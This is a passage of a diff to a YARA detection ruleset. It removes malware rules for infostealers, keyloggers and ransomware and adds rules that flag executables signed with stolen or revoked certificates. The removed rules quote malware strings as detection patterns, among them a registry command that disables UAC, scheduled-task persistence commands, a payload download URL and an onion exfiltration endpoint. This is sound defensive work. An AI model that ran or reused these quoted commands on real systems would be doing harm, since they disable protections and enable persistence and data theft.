-		$s7 = "stream started succces" wide
-		$b1 = "/C start Firefox" wide
-		$b2 = "/C start chrome" wide
-		$b3 = "/C start iexplore" wide
-		$m1 = "DefWindowProc" fullword ascii
-		$m2 = "AuthStream" fullword ascii
-		$m3 = "KillBrowsers" fullword ascii
-		$m4 = "GetAllNetworkInterfaces" fullword ascii
-		$m5 = "EnumDisplayDevices" fullword ascii
-		$m6 = "RemoteClient.Packets" fullword ascii
-		$m7 = "IServerPacket" fullword ascii
-		$m8 = "keybd_event" fullword ascii
+		thumbprint = "8057f20f9f385858416ec3c0bd77394eff595b69"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 2 of ( $b* ) ) or all of ( $s* ) or ( all of ( $b* ) and ( 4 of ( $s* ) or 5 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bddbdcfabededdeadbefed" and pe.signatures [ i ] . serial == "84:c3:a4:7b:73:9f:18:35:d3:5b:75:5d:1e:67:41:b5" )
 }
-rule DITEKSHEN_MALWARE_Win_Neptune : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_28F6Ca1F249Cfb6Bdb16Bc57Aaf0Bd79 : FILE
 {
 	meta:
-		description = "Detects Neptune keylogger / infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0f619bea-f00b-5078-95a4-83306e3e87b4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b0568efe-d0cc-528d-a9b4-fdb8106c3d0f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7931-L7953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3004-L3015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3"
+		logic_hash = "c27ad7caa87b366593b82ff5e2b38bda5383e178e2cc01121aaaa5e90beaec86"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "your keylogger has been freshly installed on" wide
-		$x2 = "Attached is a screenshot of the victim" wide
-		$x3 = "color: rgb(2, 84, 138);'>Project Neptune</span><br>" wide
-		$x4 = ">{Monitor Everything}</span><br><br>" wide
-		$x5 = "[First Run] Neptune" wide
-		$x6 = "Neptune - " wide
-		$s1 = "Melt" fullword wide
-		$s2 = "Hide" fullword wide
-		$s3 = "SDDate+" fullword wide
-		$s4 = "DelOff+" fullword wide
-		$s5 = "MsgFalse+" fullword wide
-		$s6 = "Clipboard:" fullword wide
-		$s7 = "information is valid and working!" wide
-		$s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide
-		$s9 = "http://www.exampleserver.com/directfile.exe" fullword wide
+		thumbprint = "0811c227816282094d5212d3c9116593f70077ab"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdcafaabbdcaaaeaaee" and pe.signatures [ i ] . serial == "28:f6:ca:1f:24:9c:fb:6b:db:16:bc:57:aa:f0:bd:79" )
 }
-rule DITEKSHEN_MALWARE_Win_Tomiris : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2C3E87B9D430C2F0B14Fc1152E961F1A : FILE
 {
 	meta:
-		description = "Detects Tomiris"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "86efd4fb-3c76-504e-b367-132aee59e09a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8e686e58-8fc5-50cf-9259-dcd70f5cc27b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7955-L7978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3017-L3028"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1"
+		logic_hash = "43a8f2d9055091f930af456abd334e38fb6a98bee3bfb8dcbf84c9563c777101"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "80daa4ad14fc420d7708f2855e6fab085ca71980"
+		importance = 20
 
-	strings:
-		$f1 = "main.workPath" ascii
-		$f2 = "main.selfName" ascii
-		$f3 = "main.infoServerAddr" ascii
-		$f4 = "main.configFileName" ascii
-		$s1 = "C:/Projects/go/src/Tomiris/main.go" ascii
-		$s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii
-		$s3 = "C:\\GO\\go1.16.2" ascii
-		$s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii
-		$s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii
-		$s6 = "write /TR \" Value addr= alloc base  code= ctxt: curg= free  goid  jobs= list= m->p=" ascii
-		$t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii
-		$t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii
-		$t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii
-		$t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii
-		$r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
-		$r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfaacccde" and pe.signatures [ i ] . serial == "2c:3e:87:b9:d4:30:c2:f0:b1:4f:c1:15:2e:96:1f:1a" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4808C88Ea243Eefa47610D5F5F0D02A2 : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "ea3aadc6-3edd-5e4b-adfe-824103531deb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3030-L3041"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "9fa722bfed0c31e263772615799bbdc054da1424b139c7d73e5755334fb86346"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "5dc400de1133be3ff17ff09f8a1fd224b3615e5a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $f* ) and 3 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or ( 4 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bfcdcdfcdfcaaeff" and pe.signatures [ i ] . serial == "48:08:c8:8e:a2:43:ee:fa:47:61:0d:5f:5f:0d:02:a2" )
 }
-rule DITEKSHEN_MALWARE_Win_Jennlog : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2F184A6F054Dc9F7C74A63714B14Ce33 : FILE
 {
 	meta:
-		description = "Detects JennLog loader"
+		description = "Detects executables signed AprelTech Silent Install Builder certificate"
 		author = "ditekSHen"
-		id = "38f8cd13-f157-5cce-bf04-80c29d254144"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "17797e5c-acf2-5c4e-b3e0-c48fb7bff996"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7980-L7996"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3043-L3054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627"
+		logic_hash = "d14428b81b4ae4a77a517d2148f4b67b45963b71d998139b42ed4e4352fae6a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide
-		$x2 = "https://fkpageintheworld342.com" fullword wide
-		$s1 = "ExecuteInstalledNodeAndDelete" fullword ascii
-		$s2 = "ProcessExsist" fullword ascii
-		$s3 = "helloworld.Certificate.txt" fullword wide
-		$s4 = "ASCII85 encoded data should begin with '" fullword wide
-		$s5 = "] WinRE config file path: C:\\" ascii
-		$s6 = "] Parameters: configWinDir: NULL" ascii
-		$s7 = "] Update enhanced config info is enabled." ascii
+		thumbprint = "ec9c6a537f6d7a0e63a4eb6aeb0df9d5b466cc58"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) or ( all of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APREL Tehnologija d.o.o." and pe.signatures [ i ] . serial == "2f:18:4a:6f:05:4d:c9:f7:c7:4a:63:71:4b:14:ce:33" )
 }
-rule DITEKSHEN_MALWARE_Win_Lockfile : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ced72Cc75Aa0Ebce09Dc0283076Ce9B1 : FILE
 {
 	meta:
-		description = "Detects LockFile ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "762ac376-43ff-56d2-b279-2879ce6d8542"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7482c8a9-22d7-5ecf-951c-83818e2aeda7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7998-L8014"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3056-L3067"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293"
+		logic_hash = "47fceb2a79271011bc6feed209ef4021db155dbc0fd4891f0dc1e900f2cb7fdb"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "LOCKFILE" fullword ascii
-		$x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii
-		$s1 = "</key>" fullword ascii
-		$s2 = "<computername>%s</computername>" fullword ascii
-		$s3 = "<blocknum>%d</blocknum>" fullword ascii
-		$s4 = "%s\\%s-%s-%d%s" fullword ascii
-		$s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide
-		$m1 = "<title>LOCKFILE</title>" ascii wide nocase
-		$m2 = "<hta:application id=LOCKFILE applicationName=LOCKFILE" ascii wide nocase
+		thumbprint = "db77b48a7f16fecd49029b65f122fa0782b4318f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 1 of ( $m* ) ) ) or ( 1 of ( $m* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valerie LLC" and pe.signatures [ i ] . serial == "00:ce:d7:2c:c7:5a:a0:eb:ce:09:dc:02:83:07:6c:e9:b1" )
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Foggyweb : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C4564802095258281A284809930Dcf43 : FILE
 {
 	meta:
-		description = "Attempt on hunting FoggyWeb"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "429827f7-2ccf-5c13-ac0d-1fd8b35a6740"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f70f481c-f5cf-5767-9fb0-0adecd0dc1f3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8016-L8032"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3069-L3080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d868501bc52ad7787d9e99927dd61e9ad9e2132f02348fc71e64666bfc0c9e15"
-		score = 50
+		logic_hash = "547613d507b04e3bd944515c77cb6ec161fe008b8e2b43cda574a46cbe2ef5ef"
+		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$u1 = "/adfs/portal/images/theme/light01/" ascii wide
-		$u2 = "/adfs/services/trust/2005/samlmixed/upload" ascii wide
-		$s1 = "ProcessGetRequest" ascii wide
-		$s2 = "ProcessPostRequest" ascii wide
-		$s3 = "UrlGetFileNames" ascii wide
-		$s4 = "GetWebpImage" ascii wide
-		$s5 = "GetWebpHeader" ascii wide
-		$s6 = "ExecuteAssemblyRoutine" ascii wide
-		$s7 = "ExecuteBinary" ascii wide
+		thumbprint = "73db2555f20b171ce9502eb6507add9fa53a5bf3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfeaaeedaefddfaaccefcdbae" and pe.signatures [ i ] . serial == "c4:56:48:02:09:52:58:28:1a:28:48:09:93:0d:cf:43" )
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Apostle
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3D31Ed3B22867F425Db86Fb532Eb449F : FILE
 {
 	meta:
-		description = "Attempt on hunting new variants of Apostle"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "31d15111-6935-5a77-ae9a-6bee16c1d2f6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a9924b9e-381a-58b2-8839-fcafeb730a32"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8034-L8043"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3082-L3093"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9acab5dadee0760431376075450f54bbb32ebed10dc928db91a44d069afc1576"
-		score = 50
-		quality = 73
-		tags = ""
-
-	strings:
-		$x1 = "://t.me/x4ran" ascii wide nocase
-		$x2 = "43JuFUyzfcKQwTzCTHpQoA8uLGtbwFBLyeeXoYEEU5dZLhLT1cZJDk4cytjcgQT7kdjSerJqpEp2gUcH91bjLcoq2bqik3j" ascii wide
+		logic_hash = "e3ec4fcd47867b688241dee693bcec98e633e179757ec8e7afd755c7d53a0cd7"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "1e708efa130d1e361afb76cc94ba22aca3553590"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Badfcbdbcdbfafcaeebad" and pe.signatures [ i ] . serial == "3d:31:ed:3b:22:86:7f:42:5d:b8:6f:b5:32:eb:44:9f" )
 }
 
-rule DITEKSHEN_MALWARE_Win_HUNT_Ghostemperor_Remotecontrolpayload : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_531549Ed4D2D53Fc7E1Beb47C6B13D58 : FILE
 {
 	meta:
-		description = "Attempt on hunting GhostEmperor Stage 4 Remote Control Payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d30a2aad-8bd6-5291-a31d-7dade250e57e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8045-L8052"
+		id = "6aec64ae-cda3-57e8-94c6-07c1e07d34ad"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3095-L3106"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dabce4e0add0d05b4efd8e7540e4f14767c7b5fab361bd731234dd9dd844c658"
-		score = 50
+		logic_hash = "554574657a913dbe0c576dbfcdd93a2494f2ffccf51eaabf06e5fafe2a895c3a"
+		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "a8e1f6e32e5342265dd3e28cc65060fb7221c529"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 2 and pe.exports ( "1" ) and pe.exports ( "__acrt_iob_func" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdabfbdfbcbab" and pe.signatures [ i ] . serial == "53:15:49:ed:4d:2d:53:fc:7e:1b:eb:47:c6:b1:3d:58" )
 }
-rule DITEKSHEN_MALWARE_Win_Unicorn : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_8035Ed9C58Ea895505B05Ff926D486Bc : FILE
 {
 	meta:
-		description = "Detects Unicorn infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7cc8298d-abbd-5dda-bbd4-8b061095c367"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "35b5d9a1-eaa8-53d8-9917-9a688fb95a04"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8077-L8107"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3108-L3119"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c4150b213c0dd88c87eb81e3ad455d8f658a57b0998bc6e394c5afac9423d9f2"
+		logic_hash = "caf1c962a0f4bd6c90753c6f1f0a2acadafa5fde6c7dacd02a3ca5cc15446ab4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "WinHTTP Downloader/1.0" fullword wide
-		$x2 = "[CTRL + %c]" fullword wide
-		$x3 = "\\UnicornLog.txt" fullword wide
-		$x4 = "/*INITIALIZED*/" fullword wide
-		$s1 = { 2f 00 63 00 20 00 22 00 43 00 4f 00 50 00 59 00
-               20 00 2f 00 59 00 20 00 2f 00 42 00 20 00 22 00
-               25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00
-               22 00 00 00 63 00 6d 00 64 00 2e 00 65 00 78 00
-               65 }
-		$s2 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00
-               2e 00 65 00 78 00 65 00 00 00 00 00 25 00 73 00
-               20 00 22 00 25 00 73 00 22 00 2c 00 25 00 68 00
-               73 }
-		$s3 = "%*[^]]%c%n" fullword ascii
-		$s4 = "file://%s%s%s" fullword ascii
-		$s5 = "%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$s6 = "regex_start_injects" fullword ascii
-		$s7 = "DLEXEC" fullword ascii
-		$s8 = "^((((3|1)[A-Za-z0-9]{33}))(\\s|$)|(bc1q)[A-Za-z0-9]{38}(\\s|$))" fullword ascii
-		$s9 = "^(0x)?[A-Za-z0-9]{40}(\\s|$)" fullword ascii
-		$s10 = "clipRegex" fullword ascii
-		$s11 = "%s?k=%s&src=clip&id=%s" fullword ascii
-		$s12 = "http://izuw6rclbgl2lwsh.onion/o.php" fullword ascii
+		thumbprint = "b82a7f87b7d7ccea50bba5fe8d8c1c745ebcb916"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 8 of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fecddacdddfaadcddcabceded" and pe.signatures [ i ] . serial == "80:35:ed:9c:58:ea:89:55:05:b0:5f:f9:26:d4:86:bc" )
 }
-rule DITEKSHEN_MALWARE_Win_Spectre : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Ca646B4275406Df639Cf603756F63D77 : FILE
 {
 	meta:
-		description = "Detects Spectre infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "43b32900-8dff-5a95-bcff-d6bd17703476"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "46603413-3e03-57d0-a141-1fee730de6c5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8109-L8124"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3121-L3135"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee041928ab5010fd5a06538f9a7cf9c72e44903fdb05f13b12362af0b326fd6f"
+		logic_hash = "564ca7048413d6cd65371d65906132f62386410442b36b8bafeac5e09917465f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920233-920234"
-
-	strings:
-		$s1 = "\\../../../json.h" wide
-		$s2 = "static_cast<std::size_t>(index) < kCachedPowers.size()" fullword wide
-		$s3 = " cmd.exe" fullword wide
-		$s4 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
-		$h1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" fullword wide
-		$h2 = "----974767299852498929531610575" ascii wide
-		$h3 = "Content-Disposition: form-data; name=\"file\"; filename=\"" fullword ascii
+		thumbprint = "2a68cfad2d82caae48d4dcbb49aa73aaf3fe79dd"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $h* ) ) or ( all of ( $h* ) and 2 of ( $s* ) ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) )
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Blackbyte : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E267Fdbdc16F22E8185D35C437F84C87 : FILE
 {
 	meta:
-		description = "Attempt on hunting BlackByte ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c07e9b83-3bbf-52c9-b9fa-ca03f285a906"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "520e335d-4b9f-5006-959a-1510312807be"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8126-L8139"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3137-L3148"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ceb71e42b888522c183af7e180bae47510fc7aa60a713aa83ffc2c98c03466f"
-		score = 50
-		quality = 57
+		logic_hash = "403f0f8a65997d27494d7ac4aa99cf5ebb1471839f67b2f8b380225a0263fd67"
+		score = 75
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "WalkDirAndEncrypt" ascii wide nocase
-		$s2 = "FileEncrypt" ascii wide nocase
-		$s3 = "BlackByte." ascii wide nocase
-		$s4 = "EnumerateDirAndEncrypt" ascii wide nocase
-		$s5 = "Dismount-DiskImage" ascii wide nocase
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" ascii wide nocase
+		thumbprint = "cdf4a69402936ece82f3f9163e6cc648bcbb2680"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APOTHEKA, s.r.o." and pe.signatures [ i ] . serial == "00:e2:67:fd:bd:c1:6f:22:e8:18:5d:35:c4:37:f8:4c:87" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector05 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Taffias : FILE
 {
 	meta:
-		description = "Detects downloader / injector (NiceProcess)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "857eb13b-a882-5326-b7aa-4d2fcd0b6425"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7ace9b76-104c-511a-801b-0c2d5860eaba"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8141-L8158"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3150-L3161"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5345c2b03e14b7324a13bac0da783eec8c30da18043c1b2d46162e5b511fae63"
+		logic_hash = "dc6b65757ceb3818101c8694680d1f44af3726876bef30843cfc2cb51ec6ea02"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "pidhtmpfile.tmp" fullword ascii
-		$s2 = "pidhtmpdata.tmp" fullword ascii
-		$s3 = "pidHTSIG" fullword ascii
-		$s4 = "Taskmgr.exe" fullword ascii
-		$s5 = "[HP][" ascii
-		$s6 = "[PP][" ascii
-		$s7 = { 70 69 64 68 74 6d 70 66 69 6c 65 2e 74 6d 70 00
-                2e 64 6c 6c 00 00 00 00 70 69 64 48 54 53 49 47
-                00 00 00 00 ?? ?? 00 00 54 61 73 6b 6d 67 72 2e
-                65 78 65 }
+		thumbprint = "88d563dccb2ffc9c5f6d6a3721ad17203768735a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAFFIAS" and pe.signatures [ i ] . serial == "00" )
 }
-rule DITEKSHEN_MALWARE_Win_Kutaki : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_9F2492304Fc9C93844Dea7E5D6F0Ec77 : FILE
 {
 	meta:
-		description = "Detects Kutaki"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d91812bb-4564-56b5-9757-81255b5233fb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
